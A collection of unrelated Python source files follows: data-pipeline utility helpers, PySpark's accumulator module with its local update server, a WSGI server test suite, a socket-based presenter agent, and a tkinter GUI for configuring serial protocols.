def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-n', pipeline_fn_name]
if env_file:
cli_cmd.append('-e')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
''' Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
|
accumulators.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in range(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError:...
"""
import sys
import select
import struct
if sys.version < '3':
import SocketServer
else:
import socketserver as SocketServer
import threading
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
from pyspark.accumulators import _accumulatorRegistry
# If this certain accumulator was deserialized, don't overwrite it.
if aid in _accumulatorRegistry:
return _accumulatorRegistry[aid]
else:
accum = Accumulator(aid, zero_value, accum_param)
accum._deserialized = True
_accumulatorRegistry[aid] = accum
return accum
class Accumulator(object):
"""
A shared variable that can be accumulated, i.e., has a commutative and associative "add"
operation. Worker tasks on a Spark cluster can add values to an Accumulator with the C{+=}
operator, but only the driver program is allowed to access its value, using C{value}.
Updates from the workers get propagated automatically to the driver program.
While C{SparkContext} supports accumulators for primitive data types like C{int} and
C{float}, users can also define accumulators for custom types by providing a custom
L{AccumulatorParam} object. Refer to the doctest of this module for an example.
"""
def __init__(self, aid, value, accum_param):
"""Create a new Accumulator with a given initial value and AccumulatorParam object"""
from pyspark.accumulators import _accumulatorRegistry
self.aid = aid
self.accum_param = accum_param
self._value = value
self._deserialized = False
_accumulatorRegistry[aid] = self
def __reduce__(self):
"""Custom serialization; saves the zero value from our AccumulatorParam"""
param = self.accum_param
return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))
@property
def value(self):
"""Get the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
return self._value
@value.setter
def value(self, value):
"""Sets the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
self._value = value
def add(self, term):
"""Adds a term to this accumulator's value"""
self._value = self.accum_param.addInPlace(self._value, term)
def __iadd__(self, term):
"""The += operator; adds a term to this accumulator's value"""
self.add(term)
return self
def __str__(self):
return str(self._value)
def __repr__(self):
return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)
class AccumulatorParam(object):
"""
Helper object that defines how to accumulate values of a given type.
"""
def zero(self, value):
"""
Provide a "zero value" for the type, compatible in dimensions with the
provided C{value} (e.g., a zero vector)
"""
raise NotImplementedError
def addInPlace(self, value1, value2):
"""
Add two values of the accumulator's data type, returning a new value;
for efficiency, can also update C{value1} in place and return it.
"""
raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
"""
This handler will keep polling updates from the same socket until the
server is shutdown.
"""
def handle(self):
from pyspark.accumulators import _accumulatorRegistry
auth_token = self.server.auth_token
def poll(func):
while not self.server.server_shutdown:
# Poll every 1 second for new data -- don't block in case of shutdown.
r, _, _ = select.select([self.rfile], [], [], 1)
if self.rfile in r:
if func():
break
def accum_updates():
num_updates = read_int(self.rfile)
for _ in range(num_updates):
(aid, update) = pickleSer._read_with_length(self.rfile)
_accumulatorRegistry[aid] += update
# Write a byte in acknowledgement
self.wfile.write(struct.pack("!b", 1))
return False
def authenticate_and_accum_updates():
received_token = self.rfile.read(len(auth_token))
if isinstance(received_token, bytes):
received_token = received_token.decode("utf-8")
if (received_token == auth_token):
accum_updates()
# we've authenticated, we can break out of the first loop now
return True
else:
raise Exception(
"The value of the provided token to the AccumulatorServer is not correct.")
# first we keep polling till we've received the authentication token
poll(authenticate_and_accum_updates)
# now we've authenticated, don't need to check for the token anymore
poll(accum_updates)
class AccumulatorServer(SocketServer.TCPServer):
def __init__(self, server_address, RequestHandlerClass, auth_token):
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass)
self.auth_token = auth_token
"""
A simple TCP server that intercepts shutdown() in order to interrupt
our continuous polling on the handler.
"""
server_shutdown = False
def shutdown(self):
self.server_shutdown = True
SocketServer.TCPServer.shutdown(self)
self.server_close()
def _start_update_server(auth_token):
"""Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler, auth_token)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
if __name__ == "__main__":
import doctest
(failure_count, test_count) = doctest.testmod()
if failure_count:
sys.exit(-1)
|
test_all_ctrls_wsgi.py
|
# coding: utf-8
import os
from typing import Dict
import unittest
from threading import Thread
from time import sleep
from unittest.case import skip
import urllib.request
import urllib.error
import http.client
from wsgiref.simple_server import WSGIServer, make_server
from simple_http_server.logger import get_logger, set_level
import simple_http_server.server as server
set_level("DEBUG")
_logger = get_logger("http_test")
class WSGIHttpRequestTest(unittest.TestCase):
PORT = 9090
WAIT_COUNT = 10
httpd: WSGIServer = None
server_ready = False
@classmethod
def start_server(clz):
_logger.info("start server in background. ")
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
server.scan(project_dir=root, base_dir="tests/ctrls", regx=r'.*controllers.*')
wsgi_proxy = server.init_wsgi_proxy(resources={"/public/*": f"{root}/tests/static"})
def wsgi_simple_app(environment, start_response):
return wsgi_proxy.app_proxy(environment, start_response)
clz.httpd = make_server("", clz.PORT, wsgi_simple_app)
clz.server_ready = True
clz.httpd.serve_forever()
@classmethod
def setUpClass(clz):
Thread(target=clz.start_server, daemon=False, name="t").start()
retry = 0
while not clz.server_ready:
sleep(1)
retry = retry + 1
_logger.info(f"server is not ready wait. {retry}/{clz.WAIT_COUNT} ")
if retry >= clz.WAIT_COUNT:
raise Exception("Server start wait timeout.")
@classmethod
def tearDownClass(clz):
try:
clz.httpd.shutdown()
except:
pass
@classmethod
def visit(clz, ctx_path, headers: Dict[str, str] = {}, data=None, return_type: str = "TEXT"):
req: urllib.request.Request = urllib.request.Request(f"http://127.0.0.1:{clz.PORT}/{ctx_path}")
for k, v in headers.items():
req.add_header(k, v)
res: http.client.HTTPResponse = urllib.request.urlopen(req, data=data)
if return_type == "RESPONSE":
return res
elif return_type == "HEADERS":
headers = res.headers
res.close()
return headers
else:
txt = res.read().decode("utf-8")
res.close()
return txt
def test_header_echo(self):
res: http.client.HTTPResponse = self.visit(f"header_echo", headers={"X-KJ-ABC": "my-headers"}, return_type="RESPONSE")
assert "X-Kj-Abc" in res.headers
assert res.headers["X-Kj-Abc"] == "my-headers"
def test_static(self):
txt = self.visit("public/a.txt")
assert txt == "hello world!"
def test_path_value(self):
pval = "abc"
path_val = "xyz"
txt = self.visit(f"path_values/{pval}/{path_val}/x")
assert txt == f"<html><body>{pval}, {path_val}</body></html>"
def test_error(self):
try:
self.visit("error")
except urllib.error.HTTPError as err:
assert err.code == 400
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == "code:400, message: Parameter Error!, explain: Test Parameter Error!"
def test_exception(self):
try:
self.visit("exception")
except urllib.error.HTTPError as err:
assert err.code == 500
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == '500-Internal Server Error-some error occurs!'
|
presenter_agent.py
|
# !/usr/bin/env python
# -*- coding:utf-8 -*-
# Copyright 2021 Huawei Technologies Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from threading import Thread
from .socket_client import AgentSocket
from . import presenter_message as pm
from . import presenter_datatype as datatype
class PresenterAgent():
def __init__(self, server_ip, port):
self.socket = AgentSocket(server_ip, port)
self._closed = False
def connect_server(self):
return self.socket.connect()
def start_heard_beat_thread(self):
self.heart_beat_thread = Thread(target=self._keep_alive)
self.heart_beat_thread.start()
def _keep_alive(self):
msg = pm.heartbeat_message()
while True:
if self._closed:
print("ERROR:Heard beat thread exit")
break
self.socket.send_msg(msg)
time.sleep(2)
def exit(self):
self.socket.close()
self._closed = True
def StartPresenterAgent(msg_queue, server_ip, port, open_status, data_respone_counter):
agent = PresenterAgent(server_ip, port)
ret = agent.connect_server()
if ret:
print("ERROR:Connect server failed, ret =", ret)
return
open_status.value = datatype.STATUS_CONNECTED
while True:
data = msg_queue.get()
if open_status.value == datatype.STATUS_EXITING:
open_status.value = datatype.STATUS_EXITTED
agent.exit()
break
if data:
agent.socket.send_msg(data)
msg_name, msg_body = agent.socket.recv_msg()
if (msg_name == None) or (msg_body == None):
print("ERROR:Recv invalid message, message name ", msg_name)
continue
if ((open_status.value == datatype.STATUS_CONNECTED)
and pm.is_open_channel_response(msg_name)):
print("Received open channel respone")
open_status.value = datatype.STATUS_OPENED
agent.start_heard_beat_thread()
print("presenter agent change connect_status to ", open_status.value)
if ((open_status.value == datatype.STATUS_OPENED) and
pm.is_image_frame_response(msg_name)):
data_respone_counter.value += 1
print("send ok ", data_respone_counter.value)
|
IOMaster_GUI_NoBoard.py
|
import tkinter as TK
import usb.core
import usb.util
import serial
import time
import threading
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
window = TK.Tk()
window.title("IO Master Setup")
window.geometry("400x500")
tabControl = ttk.Notebook(window)
sendTab = ttk.Frame(tabControl)
receiveTab = ttk.Frame(tabControl)
tabControl.add(sendTab, text= 'Send')
tabControl.add(receiveTab, text='Receive')
tabControl.grid(column=0, row=1, columnspan=2) #expand=1, fill="both")
#def refresh(eventObject):
#insert code to reload the window
#ser = serial.Serial(port='COM8', baudrate=115200)
#def read_from_port(ser):
# while True:
# reading = ser.read()
# print(reading)
# if reading == b'3':
# messagebox.showinfo("Works", "Pushed Button")
#def sendCommand(command):
# ser.write(command.encode('ascii', 'ignore'))
class Label:
def __init__(self, win, text):
self.lbl=ttk.Label(win, text=text)
#self.lbl.grid(column=clmn, row=row)
class combobox:
def __init__(self, win, values):
self.cb=ttk.Combobox(win, values=values, state = "readonly")
#self.cb.grid(column=clmn, row=row)
#self.cb.current(1)
def Configure_Results():
#Store Variables
Protocol = cb0.cb.get()
UVoltage = cb1.cb.get()
Frequency = cb2.cb.get()
LVoltage = cb4.cb.get()
DPower = cb5.cb.get()
DataRate = cb6.cb.get()
ClPolarity = cb7.cb.get()
ChPolarity = cb9.cb.get()
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', END)
#if Protocol == "I2C":
#if Protocol == "UART":
#if Protocol == "SPI":
#if Protocol == "SWD":
#if Protocol == "RS-485":
if Protocol == "":
OutConfigTxt.insert(TK.END, "Protocol: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Protocol: " + Protocol + '\n')
if UVoltage == "":
OutConfigTxt.insert(TK.END, "Upper Voltage: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Upper Voltage: " + UVoltage + '\n')
if Frequency == "":
OutConfigTxt.insert(TK.END, "Frequency: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Frequency: " + Frequency + '\n')
if LVoltage == "":
OutConfigTxt.insert(TK.END, "Lower Voltage: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Lower Voltage: " + LVoltage + '\n')
if DPower == "":
OutConfigTxt.insert(TK.END, "Device Power Level: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Device Power Level: " + DPower + '\n')
if DataRate == "":
OutConfigTxt.insert(TK.END, "Data Rate: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Data Rate: " + DataRate + '\n')
if ClPolarity == "":
OutConfigTxt.insert(TK.END, "Clock Polarity: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Clock Polarity: " + ClPolarity + '\n')
if ChPolarity == "":
OutConfigTxt.insert(TK.END, "Chip Polarity: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Chip Polarity: " + ChPolarity + '\n')
OutConfigTxt.configure(state="disable")
#if voltage == "3.3V":
#sendCommand('v0')
#if voltage == "5V":
#sendCommand('v1')
#if voltage == "12V":
#sendCommand('v2')
#if voltage == "24V":
#sendCommand('v3')
#Wait for OKAY (z)
#window.after(1000)
#if frequency == "1kHZ":
#sendCommand('f0')
#if frequency == "10kHZ":
#sendCommand('f1')
#if frequency == "100kHZ":
#sendCommand('f2')
#if frequency == "1MHZ":
#sendCommand('f3')
#End Function
def Data_To_Send():
dataToSend = DataText3.get('1.0', END)
for letter in dataToSend.rstrip():
if letter is not '0' and letter is not '1':
messagebox.showinfo("Error", "Invalid Data.\n Os and 1s Only")
return
if dataToSend == '\n':
messagebox.showinfo("Error", "Please Enter Data to Send.\n Os and 1s Only")
return
if len(dataToSend.rstrip()) is not 8:
messagebox.showinfo("Error", "Invalid Data.\n Should be 8 bits long.\n Os and 1s Only")
return
#print(dataToSend.rstrip())
dataToSend = 's' + dataToSend.rstrip() + '\0'
#print(dataToSend.rstrip())
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', END)
OutConfigTxt.insert(TK.END, "Data Sent: " + dataToSend.rstrip() + '\n' + str(len(dataToSend.rstrip())))
OutConfigTxt.configure(state="disable")
#sendCommand(dataToSend.rstrip())
class Button:
def __init__(self, win, text):
self.btn=ttk.Button(win, text=text, command=self.press)
#self.btn.grid(column=clmn, row=row)
def press(self):
btn_text = self.btn.cget('text')
if btn_text == "Configure":
Configure_Results()
if btn_text == "Send Data":
Data_To_Send()
#Each object needs to be created ouside the function and placed on the window in the function
lbl0 = Label(window, "Protocol:") #Protocol
lbl1 = Label(sendTab, "Upper Voltage:") #Upper Voltage
lbl2 = Label(sendTab, "Frequency:") #Frequency
lbl3 = Label(sendTab, "Data to Send:") #Data to Send
lbl4 = Label(sendTab, "Lower Voltage:") #Lower Voltage
lbl5 = Label(sendTab, "Device Power Voltage:") #Device Power Voltage
lbl6 = Label(sendTab, "Data Rate:") #Data Rate
lbl7 = Label(sendTab, "Clock Polarity:") #Clock Polarity (Rise or fall)
lbl8 = Label(sendTab, "Device Address:") #Device Address
lbl9 = Label(sendTab, "Chip Select Polarity:") #Chip Select Polarity
lbl0.lbl.grid(column=0, row=0) #place protocol selection label (Always On)
cb0 = combobox(window, ["I2C", "UART", "SPI", "SWD", "RS-485"]) #create drop down for protocol selection
cb1 = combobox(sendTab, ["3.3V","5V", "12V", "24V" ]) #Voltage Selection
cb2 = combobox(sendTab, ["1kHz", "10kHz", "100kHz", "1MHz"]) #Frequency Selection
cb4 = combobox(sendTab, ["-3.3V","-5V", "-12V", "-24V" ]) #Lower volatage level
cb5 = combobox(sendTab, ["3.3V","5V", "12V", "24V" ]) #Device Power Level
cb6 = combobox(sendTab, ["Data Rates"]) #Data Rates
cb7 = combobox(sendTab, ["Rising Edge", "Falling edge"]) #Clock Polarity
cb9 = combobox(sendTab, ["0", "1"]) #Chip Select Polarity
cb0.cb.grid(column=1, row=0) #Place drop down for protocols
DataText3 = TK.Text(sendTab, height=1, width=17) #Box to enter 8 bit command to board (gets checked)
AddressText = TK.Text(sendTab, height=1, width=17) #Box to enter the device address.
OutConfigTxt = TK.Text(window, height = 15, width = 42, state = "disabled") #Display sent configurables in this box
OutConfigTxt.grid(column=0, row=6, columnspan=3)
btn1 = Button(sendTab, "Configure") #Send configure
btn2 = Button(sendTab, "Send Data")
#Choose which objects are displayed based on the protocol chosen
def display_create(window):
#Create Interface for SPI
if cb0.cb.get() == 'SPI':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid(column=0, row=9) #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid(column=1, row=9) #Chip Select Polarity
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display I2C Components
if cb0.cb.get() == 'I2C':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb9.cb.set('')
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display UART Components
if cb0.cb.get() == 'UART':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', END)
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display SWD Components
if cb0.cb.get() == 'SWD':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid_forget() #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid_forget() #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid_forget() #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb6.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', END)
DataText3.delete('1.0', END)
DataText3.grid_forget() #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid_forget() #Send Data from text box
#display RS-485 Components
if cb0.cb.get() == 'RS-485':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid_forget() #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
cb1.cb.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
cb4.cb.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid_forget() #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb7.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', END)
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
